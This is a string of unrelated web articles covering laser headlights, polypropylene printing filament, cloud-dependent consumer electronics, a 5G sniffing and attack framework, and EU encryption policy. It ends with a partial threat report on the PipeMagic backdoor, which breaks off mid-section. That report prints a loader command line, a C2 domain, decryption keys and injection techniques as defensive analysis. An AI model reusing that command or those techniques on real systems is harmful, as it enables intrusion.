The prime selling point of laser headlights was that they could project a very bright, very focused beam a long way down the road. As we’ve explored previously, they achieved this by using blue lasers to illuminate yellow phosphors, creating a vibrant white light that could be bounced off a reflector and directed up to 600 m ahead of the vehicle. They weren’t so useful for low-beams, with that duty usually passed off to LEDs. However, they were perfect to serve as an ultra-efficient long-throw high beam that wouldn’t disrupt other road users, albeit with the aid of steerable headlamp assemblies and camera-based tracking systems.

Laser headlights were more expensive to produce, but were also far more capable than any conventional bulb in terms of throw distance. They were also more compact than just about any other automotive lighting technology, giving automotive designers far more freedom when creating a car’s front end. They were even able to outperform LEDs in the efficiency stakes. And yet, both Audi and BMW would come to abandon the technology.
A comparison from 2014 between BMW’s LED high beam (left) and laser high beam (right). Notice the far greater throw of the laser high beam. Credit: BMW
The culprit? Regulations. In particular, headlight rules enforced in the United States. The Federal Motor Vehicle Safety Standard rule 108 deems that headlight intensity must not exceed 150,000 candela, while beam range must not exceed 250 meters. These rules effectively mean that laser headlights can’t outperform older technologies without falling afoul of US regulations. The rules stand in stark contrast to European regulations, which allow headlights to reach up to 430,000 candela. In an echo of the sealed beam era, US regulations were once again stymying European innovation by being firmly stuck in the past.

Of course, US regulations don’t apply everywhere. European automakers could have kept pursuing laser headlight technology, however, other factors have also come into play. LED headlight technology has continued to improve, with newer models improving brightness and light distribution. Adaptive matrix LED headlights also allow sections of the headlight beam to be turned on and off at will to provide the best illumination without dazzling other road users.
It’s widely considered that Audi beat BMW to market with the laser headlights on the limited-edition R8 LMX, but BMW was the first to enter real series production with laser headlights on the i8. Credit: BMW
To that end, laser headlights are facing decline. While a few models in the Audi and BMW lineups still feature the headlights, both automakers are phasing them out for the future. Speaking on the matter last year, BMW’s large-car product manager, Andreas Suhrer, noted that solely LED-based designs were the future. “At the moment, we still have laser lighting on the G26 and the X7, but we don’t have future plans,” Suhrer stated. “The G60 and G61 do not have it, and the new 7 Series does not have it. I don’t think it’s completely done, but for the next models, we are making the LED Matrix lights our focus. The laser lights are pretty good with absolute range but the latest generation of Matrix LED lights does a better distribution.” Meanwhile, Audi released statements in 2024 noting that there were no plans to implement laser lighting modules in future product.

Ultimately, laser headlights were an expensive, fancy solution to a minor problem. Better high beams are surely a good thing, but given how rarely most motorists use them, they’re hardly a critical feature. Combine their high price and limited usability with the fact that one of the world’s largest car markets just made them useless, and it hardly made sense for Audi or BMW to continue pursuing this unique technology. They will go down as a luxury car curio, to be written about by bloggers every few decades as a reminder of what was once deemed cutting edge.

hackaday.com/2025/08/18/how-la…

Of all the plastics that surround us on the daily, the one we hear least about in the 3D printing world is probably polypropylene (PP). Given that this tough, slightly flexible thermoplastic has characteristics you might want for your prints, the question is: why? [Lost in Tech] is not answering that question in a recent video; instead he’s showing us what we’re missing out on with a review of the material.

A look at the Material Safety Data Sheet and available material has [Lost in Tech] suggesting it won’t be (much) more toxic for you than PLA, but you still wouldn’t want to huff the fumes. The biggest issue printing PP is getting it to stick — glass beds and PEI are not your friend, but polypropylene tape is easy to find and makes a fine print surface. He reviews a few other options, but it looks like plain old tape is still your best bet if you can’t get a hold of a Prusa PP bed. The other big issue is shrinkage, but that’s hardly unique to PP and can be accounted for in the model.

Just because it can be used, that doesn’t mean it should be. [Lost in Tech] does make a good case for why you might want to use PP — for one thing, it doesn’t string much, in part because it’s not hygroscopic. That makes it great for those of us in humid climes who don’t want to always faff around with dry boxes, but also wonderful for parts that will be in touch with water. Polypropylene also has great chemical resistance for even scarier chemicals than dihydrogen monoxide. The “killer app” though, at least as far as [Lost in Tech] is concerned, is to use polypropylene with compliant mechanisms: it’s incredibly resilient to bending, and doesn’t fatigue easily. You might even call it a “flexible” filament, but unlike with TPU, you get a nice hard plastic to go with that flexibility.

If you’re interested in this somewhat-forgotten filament, we featured a “getting started” guide last year. You can even make your own polypropylene filament using non-medical “COVID” masks, but do be sure to wash them first. What do you think? Is it time to give PP another chance, or has the 3D printing world moved on?

youtube.com/embed/yN09iY9OXlc?…

hackaday.com/2025/08/18/should…

Open any consumer electronics catalog from around the 1980s to the early 2000s and you are overwhelmed by a smörgåsbord of devices, covering any audio-visual and similar entertainment and hobby needs one might have. Depending on the era you can find the camcorders, point-and-shoot film and digital cameras right next to portable music players, cellphones, HiFi sets and tower components, televisions and devices like DVD players and VCRs, all of them in a dizzying amount of brands, shapes and colors that are sure to fit anyone’s needs, desires and budget.

When by the late 2000s cellphones began to absorb more and more of the features of these devices alongside much improved cellular Internet access, these newly minted ‘smartphones’ were hailed as a technological revolution that combined so many consumer electronics into a single device. Unlike the relatively niche feature phones, smartphones absolutely took off.

Fast-forward more than a decade and the same catalogs now feature black rectangles identified respectively as smart phones, smart TVs and tablets, alongside evenly colored geometric shapes that identify as smart speakers and other devices. While previously the onus for this change was laid by this author primarily on the death of industrial design, the elephant in the room would seem to be that consumer electronics are suffering from a terminal disease: subscription services.

Ownership And Timeshare

Family watching television in their home, c. 1958 (Credit: Evert F. Baumgardner)
In the burgeoning consumer electronics world of the 1950s, everyone was into streaming audio-visual content. This being the once popular phenomena that historians refer to as ‘radio’ and ‘television’, involving the purchase of a compatible device to receive said content on, which was being broadcast via the airwaves. Naturally, this was before the era of on-demand streaming, so you also had to subscribe to a service that would provide you with the time tables for when said content would be streamed.

Although you could buy vinyl records back then, these were relatively expensive even if you already had a record player. Fortunately, by the 1960s affordable cassette tapes for purchase of prerecorded content – as well as home recording – began to appear with Philips’ compact cassette as clear frontrunner.

By the 1970s home video recorders became affordable and surged in popularity by the 1980s and 1990s, with JVC’s VHS format enabling a massive market of both prerecorded content and of blank tapes to record any content from television broadcasts on for later perusal. At this point linear television and radio broadcasts had been largely superseded by people building up their personal audio-visual libraries in addition to borrowing tapes and later DVDs from video rental stores and public libraries.
The popular DEC VT100 terminal. (Credit: Jason Scott)
Until the 1970s digital computers were primarily a government and university thing, with businesses anxiously trying to get into the game as well to ease everything from payroll processing to inventory management and engineering. Due to the high cost – and large size – of digital computers at the time, it was more economical to use time-sharing. This changed over time from batch processing in the form of university students lugging stacks of punch cards around, to them setting themselves down in front of a terminal like the DEC VT100.

Although these computer terminals looked like computers to the lay person, they are little more than a screen and keyboard tied into I/O buffers that communicate with a remote central computer. With these terminals students could all log into their own student account on the university’s mainframe and thus stop pestering the sysadmins with their stacks of punch cards for an overdue assignment.

For government purposes the same terminal-based approach offered a good balance, while for businesses the target mainframe over at the time-sharing business was more easily accessed by something like dial-up due to the distances involved, with the mainframe’s owner charging for the used resources. This spread the expenses of owning and maintaining these early computers over as many users as possible while keeping costs low for businesses making use of these time-share services.
Casual home entertainment of the early 2000s with money being no objection. (Source: Wikimedia)
This lasted until the era of mass-produced home computers arrived by the late 1970s with microcomputers such as the Commodore PET, before culminating with the 1981 release of IBM’s 5150 Personal Computer (PC), which was decidedly the point when time-sharing of mainframes and the use of terminals had begun to rapidly fade. Within years every student, corporate worker and government employee could economically be given access to a fully capable computer system, whether in the form of a PC, Macintosh, MSX or something else, along with dedicated server systems tucked away in the business’ server room or under a desk somewhere.

Even children could now be given dedicated computers to play video games on, which would have seemed a frivolous waste of computing resources in the 1960s to anyone except university students.

Thus, as the 1980s rolled over into the 1990s it seemed like the future of technology had truly arrived, with every home potentially a true Mecca of computing power and audio-visual entertainment.

Terminal Decline

A contemporary living room. (Source: Wikimedia)
After most of the world celebrated the arrival of the new millennium in 2000, followed by the arrival of the 21st millennium a year later, the remaining euphoria of having made it to the future would quickly run into the quicksand pit of reality. After having had a quarter of the 21st century to sober up, it seems like this is the time to take a look back and question how in blazes’ name we got where we are today.

Over the past years, the living room has metamorphized from something that looks lived in, into the modern-day living room that can alternatively be described as ‘clean’ or ‘sterile’. The theme here is ‘surfaces’, which preferentially are white, black, grey or some other inoffensive color.

As you enter such a living room to be audio-visually entertained, you will pick up the smart remote that turns on the smart TV. Except the TV is always on, as it is smart and probably is always listening and running firmware updates in the background anyway. Ignoring that, your choices of entertainment are:

• A game console that is logged into your Nintendo, Sony or XBox account with likely paid-for digital games and services
• A video streaming service or two, or four, the overwhelming majority of which are subscription-only and/or force you to watch ads like in the good ol’ days of cable TV. Only the ads are much, much worse
• Content streamed off your local NAS, if you’re a total nerd
• A Blu-ray or DVD player if you’re old-fashioned and refuse to join the Digital-Only Content Age

For the overwhelming majority of smart TV users, they are a recurring revenue source for streaming services, with the TV being the device purchased by the viewer in order to access said services. Much the same is true with modern game consoles, where you effectively must be logged into your online account to do much of anything with the console and an increasing amount of games, if only to obtain the latest updates to fix bugs. This triply so if you are one of those people who are into cloud gaming.

As you ignore that your smart TV is basically a cross between a very advanced VT100 terminal and a Telescreen, you glance at the glass-and-plastic slab in your hand as one of your friends just messaged you on a messaging app – which annoyingly again advertises a premium subscription account – about this rad new music album on this one streaming audio service. Fortunately you are already a member, so you add the album for later listening.

That your smart TV, game console, and smart phone are all just terminals for some remote server begins to sink in once your internet access has been cut off. You cannot stream any audio-visual content, and many of your video games outright refuse to run because of a lack of internet connectivity. Ditto for your smart speakers, which have begun to stubbornly ignore your calls for attention.

When you sigh and flip open your laptop to maybe do some work, you find that your software products refuse to even launch, as they absolutely needed to refresh their license key verification this instant. Feeling mildly upset by their accusations of you having pirated their over-priced software after forking over so much cash each month, you slam the laptop shut again. This is when you realize that your project files are stored safely on the now unreachable cloud storage account anyway.

Ultimately you find yourself just staring at the black rectangles and inoffensive geometric shapes that once entertained you or made you more productive, but which now have left you terrifyingly alone with your own thoughts. Maybe you will have to do something drastic soon, like try reading a book, drag out that old CD player, play chess against yourself, or do some sketching on paper. With a real pencil.

Shareholder Value

The move from a boxed copy of stand-alone software and physical products to something with a recurring monthly or annual cost has been a gradual one. Much of it can already be traced back to the overly optimistic days leading up to the dot-com bubble, when the internet was going to make everyone rich and the selling of online goods the new normal.

Although the resulting fallout from this bubble popping was rather extensive, it left the investors who escaped the catastrophe wiser and still positively slavering at the thought of using the Internet for unimaginable levels of that sweetest reward of all: recurring revenue, with people giving you their money every month just to keep what they mistakenly thought that they had purchased.

The challenge is of course that people in general like to own things, and are rather hesitant to buy into anything that makes them have fewer things. How do you make people voluntarily buy into owning less and less, with what they do own having fewer features? The answer would seem to lie in blinding them with shiny new features, while insisting that they really don’t need the features that you are about to remove or nerf.

For example, initially people loved the idea of a smartphone because it meant that they could carry around in their pocket a cellphone, a camcorder, photo camera, portable internet-capable computer, an FM radio, a music player and more, all in a single device. Unfortunately all of these functions have been nerfed in some way or form.

FM Radio

Although regular analog radio on the FM and AM bands has lost a lot of importance these days, having FM radio available can be incredibly useful. Consider being out somewhere with poor cell coverage, not wanting to use up your data allowance for the month, or when everything has gone sideways in the form of a hurricane and the local grid, internet and cell network have collapsed. Especially in the latter case it would be convenient if you could just open the FM radio app on your smartphone to tune into emergency broadcasts.

Unfortunately this feature has been purposefully disabled or left out by device manufacturers, with Apple having opted to not even add an FM radio to its custom SoCs. A quick look at a couple of major smartphone manufacturers over at GSM Arena for smartphones released in 2024 or 2025 featuring an FM radio only shows two, both budget Samsung models.

Typically only budget-level smartphones have an FM radio feature enabled, as one aspect of the FM radio feature is that it requires its own antenna, which generally is a set of headphones plugged into the 3.5 mm audio jack. This logically means that the survival chances of budget smartphone buyers is significantly higher during a natural disaster than for people buying iPhones or higher-end Samsung and Xiaomi phones.

Audio Jack

Generic USB-C to audio jack and USB-C charging adapter.
The analog audio from a 3.5 mm audio jack is a low-latency, high-fidelity way to experience audio, only limited by the used audio DAC and the headphones or in-ears plugged into the jack. This makes it rather baffling that it’s also among the most vilified features. The reason here isn’t that it compromises waterproofing, or impedes thinness or adds cost, but rather it gets dropped on higher-end smartphones because Apple dropped it to promote their Bluetooth headphones and others followed.

Unfortunately, Bluetooth audio is neither low-latency nor high-fidelity, with newer codecs like LDAC, AptX, and AAC slightly improving the audio quality over the default SBC codec, but keeping all the other compromises. Meanwhile a fraction of the USB-C connectors on phones support the alternative analog audio mode, returning an audio jack to the device with a dongle, yet not re-enabling the use of headphones as an FM antenna and also making it impossible to use the USB-C port for any data transfers, while making the entire setup significantly more clunky, just to get a previously eliminated port back on the device instead of just putting it on there in the first place.

SD Cards

An important feature of a digital camera and camcorder is being able to quickly get the data off it and onto a computer for processing and viewing. Unfortunately in so far as smartphones supported SD card expansion, this at the very least required taking off the plastic back to swap cards. These days the SD card either shares space with the SIM card(s), or is eliminated altogether.

The idea here is of course to increase recurring revenue: the easiest way to get data onto a smartphone or off it is via the device manufacturer’s cloud storage solutions, with a minor fee to bump it up to a usable amount of storage. You’re also not supposed to load your own audio files onto the internal storage either, but use the paid-or-ad-supported streaming solution. Why would you want to be un-cool and not listen to losslessly streamed audio files mangled by some Bluetooth codec through the second pair of wireless in-ears of this month as the previous ones fell out somewhere?

Fortunately, the marketing is very convincing, as you can now listen to or watch anything that you want – as long as it’s available on the streaming service – and you can even use your voice to tell any of your smart devices to play a song or open a movie, because this is what the future looks like. Never mind that you do not technically own much any more, but at least you are happy.

Terminal Life

Probably the biggest question here is whether or not this terminalification is harmful. Sure, this change has meant that industrial design got effectively shivved in the proverbial dark alley – since the user interface of devices now lives on the device manufacturer’s servers – but you now have all these cool features. Things like a smart home full of Internet of Things devices, each of which are first and foremost terminals for the manufacturer’s services, with local control an afterthought, if a thought at all.

Even governments and businesses haven’t managed to escape these changes with their own vortex back to the 1960s. Rather than using a dial-up modem to connect to a time-share mainframe, they now use a broadband Internet connection to connect to a time-share mainframe, except we now call it a ‘cloud’.

It’s often been said that the centralization and decentralization of computer technology in particular is cyclical, with the 1980s and 1990s forming the pinnacle of decentralization. If we are currently in a trough of terminal terminalification, then logically decentralization and determinalification should follow next. One could make the point here that the Right to Repair movement is part of this change, as it wrests control away from manufacturers.

Even so, we still have a long way to go if this is the next stop, with our current physical media revival kerfuffle being just one of the many things that we have to come to terms with. Between the glossy marketing and the often conflicting desires and needs of the average consumer, it’s probably anyone’s guess what the second quarter of the 21st century will look like for consumer electronics and beyond.

hackaday.com/2025/08/18/the-te…

IT'S MONDAY AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and in the doldrums of (a very hot!) August, I'm already planning for September. I'll be in Brussels the week of Sept. 8. If you're around for coffee, reach out here.

— Efforts to unpick encryption in the name of child protection are gaining ground again. The proposals are based on the fallacy that they won't undermine universal privacy rights.

— The Trump-Putin summit fall-out: A view from the Russian propaganda machine.

— Everything you need to know about the cottage industry of copyright lawsuits taking on AI companies.

Let's get started:

WHEN IS IT OK TO BREAK END-TO-END ENCRYPTION?

THERE ARE A FEW CONSTANTS IN LIFE. Death. Taxes. And — at least for digital policymakers — the never-ending battle between those seeking to weaken encryption technology in the name of public safety and those fearful that such attempts will undermine people's fundamental privacy rights.

Over the years (more from me in 2019 and again in 2023), this fight has led to strange bedfellows. Law enforcement types have partnered with child safety advocates to demand the likes of Meta and Apple open up their encrypted services to greater oversight — all in the name of protecting against terrorist threats and child sexual abuse material. In the other camp, Silicon Valley and privacy groups (not the easiest of allies) raise legitimate concerns that you can't just weaken such encryption technologies for the "good guys." Inevitably, the "bad guys," too, will gain access.

American officials have often wavered between both camps. Officials are torn between the political realities of online child safety and the economic realities of protecting American tech giants from non-US tech regulation.

But in Europe, the drumbeat for encryption-busting policies has gone from a soft hum to a loud bang.

The smaller scuffle is in the United Kingdom where the government told Apple earlier this year to grant its security services access to its encrypted systems under the country's Investigatory Powers Act. Those rules had long been on the books. But the powers to compel companies to open up had never been used via so-called "technical capability notices." Still, London is now backing off amid complaints from the White House — and wider efforts by the UK to strike digital-focused trade agreements with the United States.

There's still outstanding concerns that the UK's Online Safety Act, which also includes powers to force such encryption breaking in the name of public safety, may lead to a similar transatlantic stand-off. Ofcom, the British regulator in charge of that legislation, however, has always made clear it will only pursue such demands if/when a technology is developed that both allows for outside access while preserving the underlying encryption. In short, that's a technical impossibility, allowing the UK regulator to punt any politically-sensitive issues into the long grass.

Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com

And that takes us to the European Union.

Long-time Brussels watchers will know the bloc's attempt to thwart child sexual abuse material — often accessed via online platforms — remains the unwanted love-child (no pun intended) of European digital regulation. Those proposals were first put forward in 2022. Yet since then, the ever-present tussle between safety and privacy (see above) has seen the legislation ping-pong between consecutive rotating presidencies of the European Council, or grouping of EU member states that nominally runs the bloc's policy agenda.

In July, Denmark (in charge until the end of the year) restarted this encryption spat after proposing changes (HT: Euractiv) to the child sexual abuse material legislation. The major overhaul compared to the Polish EU Council presidency (which ran for the first half of 2025) was to include demands that companies with encrypted technology comply with so-called mandatory detection orders, or legal requirements to check people's (encrypted) messages for possible illegal content.

What's more, the draft text — to be voted on by EU member states in mid October — included potential requirements to carry out these checks on individuals' devices, and not when they were shared over the cloud. That led to hackles from both tech executives and privacy campaigners. For more on what that looks like, check out this post from Meta's one-time top Brussels lobbyist (and now a Finnish member of the European Parliament) Aura Salla.

For the Danes, this is all about kids' safety. Speaking in Denmark in late July, the country's justice minister, Peter Hummelgaard, said his aim was to protect the privacy of those affected by these heinous images. "We need to ask ourselves, at the end of the day, whose privacy is it that we're mostly concerned with?" he told reporters. "We need to compromise on these differing views" (between child safety and privacy campaigners.)

The Danish EU presidency's half-year priorities also make its objectives explicit. "The Presidency will focus on strengthening the abilities to make use of the digital development for law enforcement when fighting serious crime," the document reads. "The Presidency will work to ensure the protection of fundamental rights as well as cooperation and protection in the area of civil matters."

A lot can happen between now and the proposed vote in October. For one thing, not all EU member states agree with the Dane's proposals. Without unanimity, the current draft proposals — like so many before them via the Hungarian and Polish EU Presidencies — may never get passed. That's especially true if US politicians realize what is going on in Brussels and cause a stink.

The thing is, none of this politicking finds a solution for what are two clear realities.

On the one side, it is a fact that encrypted messaging services are used for illegality, including the spread of child sexual abuse material. If you don't believe me, read this report from Australia's eSafety Commissioner. On the other, governments can't break encryption technology without compromising people's privacy rights. There are technical solutions like "hashing" and "matching" that can stop the spread of known illegal content. But including backdoors in end-to-end encrypted services will only lead to greater harm.

What we are lacking is a clear conversation about what are uncomfortable trade-offs.

It's impossible to balance the needs of protecting children from online predatory behavior (more on that here) and wider society's expectations of a base level of privacy. To suggest that some sort of yet-created technology will thread the needle between those fundamental rights is farcical. Policymakers should acknowledge that, and have an honest conversation with citizens about what is the least-worst option.

My personal view is that the breaking of encryption — and therefore the weakening of wider privacy rights — is not the right way to go (at least not yet) to protect children online. There are less invasive policy choices like baking in "privacy by design" principles into online platforms that can mitigate some, but not all, of the potential harm. Should children be able to receive DMs from strangers? No. Should they be able to access services before they reach the minimum age? Also no.

Neither of those policy choices has been effectively implemented yet. To jump directly to the "let's read everyone's messages!" stage makes good politics. But it does not represent a grown-up approach to what are impossible trade-offs.

At some point, encryption may have to be broken. But before we get there, all other policy options should be exhausted. That includes forcing platforms to embed privacy-by-design principles into their services and finding privacy-conscious "age assurance" techniques to safeguard children from areas of the internet that should remain off-limits.

Until that happens, the rush to break encryption should be viewed for what it is: a politically-expedient sledgehammer to crack a nut.

Chart of the Week

THE LATEST AI SYSTEMS ARE ONLY AS GOOD as the data upon which they are trained. For many companies, that means scraping reams of copyrighted material from around the world.

Publishers claim this is a slam dunk case of copyright infringement. AI giants like Google, OpenAI and Microsoft argue their tactics fit within the "fair use" principle.

Soon, we'll know who's right.

There are currently 45 copyright lawsuits in the US between publishers and AI companies related to how such data is used to train large language models. For links to all the cases below, check out the "source" section in the chart.
Source: ChatGPT is Eating the World

THE TRUMP-PUTIN SUMMIT PROPAGANDA AFTERMATH

FOR ALMOST EVERYONE (outside of Donald Trump's administration), the Aug. 15 Russo-American summit was a major political victory for Vladimir Putin. The US president rejected those claims. Yet ahead another round of meetings, this time in the White House on Aug. 18 with Western leaders and the Ukrainian president, Russia's state-backed media was again reframing quotes from leading US officials to meet Mocow's own political needs.

This has become a major trend in how the likes of Sputnik and RT speak to their international audiences.

Gone are the attacks on American imperialism, although those narratives still show up in Kremlin-backed media whose audiences span Latin America and French-speaking Africa. Instead, Moscow has been eager to frame the Aug. 15 summit as a win for both the US and Russia, while claiming it is now down to Volodymyr Zelenskyy, Ukraine's president, to find a solution to the bloody conflict in Eastern Europe.

That builds on public statements from Trump who claimed, in a social media post on Aug. 17, that Zelenskyy "can end the war with Russia almost immediately, if he wants to, or he can continue to fight." RT Mundo quickly jumped on that statement.

On RT, the English-language outlet, comments from Marco Rubio, the US Secretary of State, were picked up to suggest the war was "going to get worse" if Ukraine did not agree to a peace deal with Russia. In the outlet's German-language website, the Ukrainian president was also attacked over alleged corruption abuses — only weeks after Zelenskyy backtracked on new laws that would have undermined two national anti-corruption agencies.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

For Russia's state media, the Aug. 15 summit between Trump and Putin was shaped as a meeting of like-minded leaders, both of whom secured something out of the half-day event. "Trump can now indefinitely postpone a disastrous trade war with India and China, which secondary sanctions on Russia would have triggered," read an opinion article on RT that subsequently called on Zelenskyy to reach a peace deal with the Russian president. "Putin, meanwhile, drove home the point that a temporary ceasefire is insufficient – that the time has come to talk about a full peace treaty."

Ahead of the planned Aug. 18 meetings in Washington, during which several European leaders are expected to travel alongside Zelenskyy to put pressure on Trump over any potential long-term peace deal, Russian state media highlighted Europe's alleged weaknesses." That included jumping on comments from Friedrich Merz, the German chancellor, about the bloc's role in any potential negotiations, as well as a social media post from Guiseppe Conte, a former Italian prime minister, that framed Europe as a mere "supporting actor."

Ever since Trump returned to the White House, the Kremlin's state-backed media has balanced its eagerness to demonstrate renewed kinship between Russia and the US and its wariness that, eventually, relations will break down (again) between the long-time adversaries.

That message came through in an opinion articlewritten in RT en Français that both praised last week's summit, but reminded Russia it would need to promote its interests by strength if it wanted to secure its objectives in Ukraine. "It is now up to Russia, the last bulwark against total global dictatorship, to continue to defend its national interests," read the article. "It is simply important to understand that the meeting between the two presidents did not, in itself, magically resolve the conflict between these two worlds.

"In the end, there can only be one."

What I'm reading

— A group of independent research organizations published an in-depth analysis into the potential role of foreign manipulation in the recent Polish presidential election. More here.

— Casey Fiesler put together a series of social media-friendly tutorials on AI ethics. More here and why she did it here.

— Alexios Matnzarlis at the Indicator discovered dozens of TikTok accounts using AI avatars of real journalists to spread false information. More here.

— Anna Lenhart and Katie Shilton asked TikTok users about their awareness and potential concerns about researchers reviewing their social media posts. More here.

— Wikimedia lost a legal challenge against its attempt to be excluded from provisions within the UK's Online Safety Act. More here.

digitalpolitics.co/newsletter0…

The fifth generation mobile communications protocol (5G) is perhaps the most complicated wireless protocol ever made. Featuring wildly fast download speeds, beam forming base stations, and of course non-standard additions, it’s rather daunting prospect to analyze for the home hacker and researcher alike. But this didn’t stop the ASSET Research Group from developing a 5G sniffer and downlink injector.

The crux of the project is focused around real-time sniffing using one of two Universal Software Radio Peripheral (USRP) software-defined radios (SDRs), and a substantial quantity of compute power. This sniffed data can even be piped into Wireshark for filtering. The frequency is hard-coded into the sniffer for improved performance with the n78 and n41 bands having been tested as of writing. While we expect most of you don’t have the supported USRP hardware, they provided a sample capture file for anyone to analyze.

The other main feature of the project is an exploitation framework with numerous attack vectors developed by ASSET and others. By turning an SDR into a malicious 5G base station, numerous vulnerabilities and “features” can be exploited to with results ranging from downgrading the connection to 4G, fingerprinting and much more. It even includes an attack method we preciously covered called 5Ghull which can cause device failure requiring removal of the SIM Card. These vulnerabilities offer a unique look inside the inner workings of 5G.

If you too are interested in 5G sniffing but don’t have access to the hardware needed, check out this hack turning a Qualcomm phone into a 5G sniffer!

hackaday.com/2025/08/18/sniffi…

In April 2025, Microsoft patched 121 vulnerabilities in its products. According to the company, only one of them was being used in real-world attacks at the time the patch was released: CVE-2025-29824. The exploit for this vulnerability was executed by the PipeMagic malware, which we first discovered in December 2022 in a RansomExx ransomware campaign. In September 2024, we encountered it again in attacks on organizations in Saudi Arabia. Notably, it was the same version of PipeMagic as in 2022. We continue to track the malware’s activity. Most recently, in 2025 our solutions prevented PipeMagic infections at organizations in Brazil and Saudi Arabia.

This report is the result of a joint investigation with the head of vulnerability research group at BI.ZONE, in which we traced the evolution of PipeMagic – from its first detection in 2022 to new incidents in 2025 – and identified key changes in its operators’ tactics. Our colleagues at BI.ZONE, in turn, conducted a technical analysis of the CVE-2025-29824 vulnerability itself.

Background

PipeMagic is a backdoor we first detected in December 2022 while investigating a malicious campaign involving RansomExx. The victims were industrial companies in Southeast Asia. To penetrate the infrastructure, the attackers exploited the CVE-2017-0144 vulnerability. The backdoor’s loader was a trojanized version of Rufus, a utility for formatting USB drives. PipeMagic supported two modes of operation – as a full-fledged backdoor providing remote access, and as a network gateway – and enabled the execution of a wide range of commands.

In October 2024, organizations in Saudi Arabia were hit by a new wave of PipeMagic attacks. This time, rather than exploiting vulnerabilities for the initial penetration, the attackers used a fake ChatGPT client application as bait. The fake app was written in Rust, using two frameworks: Tauri for rendering graphical applications and Tokio for asynchronous task execution. However, it had no user functionality – when launched, it simply displayed a blank screen.

Blank screen of the fake application

At the same time, the application extracted a 105,615-byte AES-encrypted array from its code, decrypted it, and executed it. The result was a shellcode loading an executable file. To hinder analysis, the attackers hashed API functions using the FNV-1a algorithm, with the shellcode dynamically resolving their addresses via GetProcAddress. Next, memory was allocated, necessary offsets in the import table were relocated, and finally, the backdoor’s entry point was called.

One unique feature of PipeMagic is that it generates a random 16-byte array used to create a named pipe formatted as: \\.\pipe\1.<hex string>. After that, a thread is launched that continuously creates this pipe, attempts to read data from it, and then destroys it. This communication method is necessary for the backdoor to transmit encrypted payloads and notifications. Meanwhile, the standard network interface with the IP address 127.0.0.1:8082 is used to interact with the named pipe.

To download modules (PipeMagic typically uses several plugins downloaded from the C2 server), attackers used a domain hosted on the Microsoft Azure cloud provider, with the following name: hxxp://aaaaabbbbbbb.eastus.cloudapp.azure[.]com.

PipeMagic in 2025

In January 2025, we detected new infections in Saudi Arabia and Brazil. Further investigation revealed connections to the domain hxxp://aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which suggested a link between this attack and PipeMagic. Later, we also found the backdoor itself.

Initial loader

In this attack, the loader was a Microsoft Help Index File. Usually, such files contain code that reads data from .mshc container files, which include Microsoft help materials. Upon initial inspection, the loader contains obfuscated C# code and a very long hexadecimal string. An example of executing this payload:
c:\windows\system32\cmd.exe "/k c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe c:\windows\help\metafile.mshi"

Contents of metafile.mshi

The C# code serves two purposes – decrypting and executing the shellcode, which is encrypted with the RC4 stream cipher using the key 4829468622e6b82ff056e3c945dd99c94a1f0264d980774828aadda326b775e5 (hex string). After decryption, the resulting shellcode is executed via the WinAPI function EnumDeviceMonitor. The first two parameters are zeros, and the third is a pointer to a function where the pointer to the decrypted shellcode is inserted.

The injected shellcode is executable code for 32-bit Windows systems. It loads an unencrypted executable embedded inside the shellcode itself. For dynamically obtaining system API addresses, as in the 2024 version, export table parsing and FNV-1a hashing are used.

Loader (ChatGPT)

In 2025, we also found PipeMagic loader samples mimicking a ChatGPT client. This application resembles one used in campaigns against organizations in Saudi Arabia in 2024. It also uses the Tokio and Tauri frameworks, and judging by copyright strings and PE header metadata, the executable was built in 2024, though it was first discovered in the 2025 campaign. Additionally, this sample uses the same version of the libaes library as the previous year’s attacks. Behaviorally and structurally, the sample is also similar to the application seen in October 2024.

Decrypting the payload using AES

Loader using DLL hijacking

In addition to the initial execution method using a .mshi file launched through msbuild, the attackers also used a more popular method involving decrypting the payload and injecting it with the help of an executable file that does not require additional utilities to run. The executable file itself was legitimate (in this campaign we saw a variant using the Google Chrome update file), and the malicious logic was implemented through a library that it loads, using the DLL hijacking method. For this, a malicious DLL was placed on the disk alongside the legitimate application, containing a function that the application exports.

It is worth noting that in this particular library sample, the exported functions were not malicious – the malicious code was contained in the initialization function (DllMain), which is always called when the DLL is loaded because it initializes internal structures, file descriptors, and so on.

First, the loader reads data from an encrypted file – the attackers pass its path via command-line arguments.

Reading the payload file

Next, the file contents are decrypted using the symmetric AES cipher in CBC mode, with the key 9C3BA5 B2 D3222FE5863C14D51340D7 F9, and the initialization vector (IV)221BA50915042098AF5F8EE40E5559C8.

The library deploys the decrypted code into memory and transfers control to it, and the original file is subsequently deleted. In the variants found during analysis, the payload was a shellcode similar to that discovered in the 2024 attacks involving a ChatGPT client.

Deployed PE

In all the loading methods described above, the payload was an executable file for 32-bit Windows systems. Interestingly, in all cases, this file supported graphical mode, although it did not have a graphical user interface. This executable file is the PipeMagic backdoor.

At the start of its execution, the sample generates 16 random bytes to create the name of the pipe it will use. This name is generated using the same method as in the original PipeMagic samples observed in 2022 and 2024.

Creating a pipe with a pre-generated name

The sample itself doesn’t differ from those we saw previously, although it now includes a string with a predefined pipe path: \.\pipe\magic3301. However, the backdoor itself doesn’t explicitly use this name (that is, it doesn’t interact with a pipe by that name).

Additionally, similar to samples found in 2022 and 2024, this version creates a communication pipe at the address 127.0.0.1:8082.

Discovered modules

During our investigation of the 2025 attacks, we discovered additional plugins used in this malicious campaign. In total, we obtained three modules, each implementing different functionality not present in the main backdoor. All the modules are executable files for 32-bit Windows systems.

Asynchronous communication module

This module implements an asynchronous I/O model. For this, it uses an I/O queue mechanism and I/O completion ports.

Processing core commands

Immediately upon entering the plugin, command processing takes place. At this stage, five commands are supported:

Although I/O changes via completion ports are processed in a separate thread, the main thread waits for current file operation to complete – so this model is not truly asynchronous.

Getting the I/O queue status

If the command with ID 0x3 (file I/O processing) is selected, control is transferred to an internal handler. This command has a set of subcommands described below. Together with the subcommand, this command has a length of at least 4 bytes.

The command with ID 0x5 is presumably implemented to set a read error flag. If this flag is set, reading operations become impossible. At the same time, the module does not support commands to clear the flag, so effectively this command just blocks reading from the file.

